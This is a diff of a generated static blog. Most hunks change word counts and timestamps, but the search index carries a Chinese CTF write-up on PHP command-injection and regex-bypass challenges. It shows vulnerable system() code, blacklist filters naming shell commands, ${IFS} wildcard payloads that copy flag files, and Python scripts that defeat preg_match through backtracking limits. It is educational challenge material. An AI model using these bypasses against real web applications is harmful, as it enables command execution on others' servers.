diff --git a/2023/10/24/hello-world/index.html b/2023/10/24/hello-world/index.html index 94b5b4b..751e0fe 100644 --- a/2023/10/24/hello-world/index.html +++ b/2023/10/24/hello-world/index.html @@ -1094,7 +1094,7 @@

你的赏识是我前进的动力


  站点总字数: 404 + class="white-color">405 diff --git a/2023/10/24/test/index.html b/2023/10/24/test/index.html index 3f80575..2826ff7 100644 --- a/2023/10/24/test/index.html +++ b/2023/10/24/test/index.html @@ -401,7 +401,7 @@

test

文章字数:   - 331 + 332
@@ -445,6 +445,7 @@

PHP] strpos stripos strrpos strripos的区别-CSDN博客

+

123

@@ -1097,7 +1098,7 @@

你的赏识是我前进的动力


  站点总字数: 404 + class="white-color">405 diff --git a/404.html b/404.html index 6b3189b..a17e465 100644 --- a/404.html +++ b/404.html @@ -454,7 +454,7 @@
  站点总字数: 404 + class="white-color">405 diff --git a/archives/2023/10/index.html b/archives/2023/10/index.html index 20f02b1..9c751f8 100644 --- a/archives/2023/10/index.html +++ b/archives/2023/10/index.html @@ -682,7 +682,7 @@
  站点总字数: 404 + class="white-color">405 diff --git a/archives/2023/index.html b/archives/2023/index.html index 912b80d..e0ef603 100644 --- a/archives/2023/index.html +++ b/archives/2023/index.html @@ -682,7 +682,7 @@
  站点总字数: 404 + class="white-color">405 diff --git a/archives/index.html b/archives/index.html index c2f79d2..93b4265 100644 --- a/archives/index.html +++ b/archives/index.html @@ -682,7 +682,7 @@
  站点总字数: 404 + class="white-color">405 diff --git a/atom.xml b/atom.xml index a4b444e..164823c 100644 --- a/atom.xml +++ b/atom.xml @@ -6,7 +6,7 @@ - 2023-10-29T04:28:17.636Z + 2023-10-29T06:32:34.600Z https://harmor123.github.io/harmor.github.io/ @@ -21,7 +21,7 @@ https://harmor123.github.io/harmor.github.io/2023/10/24/test/ 2023-10-24T12:25:59.000Z - 2023-10-29T04:28:17.636Z + 2023-10-29T06:32:34.600Z diff --git a/index.html b/index.html index c0a6a42..51f3456 100644 --- a/index.html +++ b/index.html @@ -754,7 +754,7 @@
  站点总字数: 404 + class="white-color">405 diff --git a/search.xml b/search.xml index 9ce8064..5a863df 100644 --- a/search.xml +++ b/search.xml @@ -8,7 +8,7 @@ /harmor.github.io/2023/10/24/test/ - 1.ez_rce
1
2
3
4
5
6
7
8
9
10
11
12
13
<?php

$rce = $_GET['rce'];
if (isset($rce)) {
if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) {
system($rce);
}else {
echo "hhhhhhacker!!!"."\n";
}
} else {
highlight_file(__FILE__);
}

1
2
3
4
5
6
7
8
9
10
11
?rce=ls  #有flag.php
?rce=cp${IFS}fla?.php${IFS}a.txt

<?php
$flag = getenv('GZCTF_FLAG');
if($flag=="not_flag" or $flag==""){
$flag="dzctf{test_flag}";
} #假的flag

?rce=ls${IFS}/ #有flag
?rce=cp${IFS}/fla?${IFS}a.php #然后url/a.php 可得flag

2.ez_php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php 
error_reporting(0);
highlight_file('./index.txt');
if(isset($_POST['c_ode']) && isset($_GET['num']))
{
$code = (String)$_POST['c_ode'];
$num=$_GET['num'];
if(preg_match("/[0-9]/", $num))
{
die("no number!");
}
elseif(intval($num))
{
if(preg_match('/.+?SHCTF/is', $code))
{
die('no touch!');
}
if(stripos($code,'2023SHCTF') === FALSE)
{
die('what do you want');
}
echo $flag;
}
}

PHP intval()函数详解,intval()函数漏洞原理及绕过思路_intval绕过-CSDN

回溯法绕过正则匹配

1
2
3
4
5
6
7
import requests
url="http://112.6.51.212:31842/?num[]=1"
data={
'c[ode':'a'*1000000+'2023SHCTF'
}
r=requests.post(url,data=data)
print(r.text)

本题与下面一道题进行对比:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<?php

$as=$_POST['as'];
$code = $_POST['code'];

function process($code){
return preg_replace("/php|cat|tac|assert|pcntl_exec|fwrite|curl|sleep|eval|system|assert|flag|shell_exec|passthru|exec|F10g|fl0g|fl1g|phar/i",'',$code);
}

if(!is_array($as)){

if(!preg_match_all('/but.*how/is',$as)){

if(strpos($as,'but how')!==false){

system(process($code));

}else{
die('tip: backup file there');
}

}else{
die('NO there');
}
}
?>
1
2
3
4
5
6
7
8
import requests
url=""
data={
'as':'but how'+'a'*1000000,
'code':'sort /flflagag'
}
r=requests.post(url,data=data)
print(r.text)

正则回溯地方不同点在于前者是stripos()函数,后者是strpos()函数。

[PHP] strpos stripos strrpos strripos的区别-CSDN博客

]]>
+ 1.ez_rce
1
2
3
4
5
6
7
8
9
10
11
12
13
<?php

$rce = $_GET['rce'];
if (isset($rce)) {
if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) {
system($rce);
}else {
echo "hhhhhhacker!!!"."\n";
}
} else {
highlight_file(__FILE__);
}

1
2
3
4
5
6
7
8
9
10
11
?rce=ls  #有flag.php
?rce=cp${IFS}fla?.php${IFS}a.txt

<?php
$flag = getenv('GZCTF_FLAG');
if($flag=="not_flag" or $flag==""){
$flag="dzctf{test_flag}";
} #假的flag

?rce=ls${IFS}/ #有flag
?rce=cp${IFS}/fla?${IFS}a.php #然后url/a.php 可得flag

2.ez_php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php 
error_reporting(0);
highlight_file('./index.txt');
if(isset($_POST['c_ode']) && isset($_GET['num']))
{
$code = (String)$_POST['c_ode'];
$num=$_GET['num'];
if(preg_match("/[0-9]/", $num))
{
die("no number!");
}
elseif(intval($num))
{
if(preg_match('/.+?SHCTF/is', $code))
{
die('no touch!');
}
if(stripos($code,'2023SHCTF') === FALSE)
{
die('what do you want');
}
echo $flag;
}
}

PHP intval()函数详解,intval()函数漏洞原理及绕过思路_intval绕过-CSDN

回溯法绕过正则匹配

1
2
3
4
5
6
7
import requests
url="http://112.6.51.212:31842/?num[]=1"
data={
'c[ode':'a'*1000000+'2023SHCTF'
}
r=requests.post(url,data=data)
print(r.text)

本题与下面一道题进行对比:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<?php

$as=$_POST['as'];
$code = $_POST['code'];

function process($code){
return preg_replace("/php|cat|tac|assert|pcntl_exec|fwrite|curl|sleep|eval|system|assert|flag|shell_exec|passthru|exec|F10g|fl0g|fl1g|phar/i",'',$code);
}

if(!is_array($as)){

if(!preg_match_all('/but.*how/is',$as)){

if(strpos($as,'but how')!==false){

system(process($code));

}else{
die('tip: backup file there');
}

}else{
die('NO there');
}
}
?>
1
2
3
4
5
6
7
8
import requests
url=""
data={
'as':'but how'+'a'*1000000,
'code':'sort /flflagag'
}
r=requests.post(url,data=data)
print(r.text)

正则回溯地方不同点在于前者是stripos()函数,后者是strpos()函数。

[PHP] strpos stripos strrpos strripos的区别-CSDN博客

123

]]>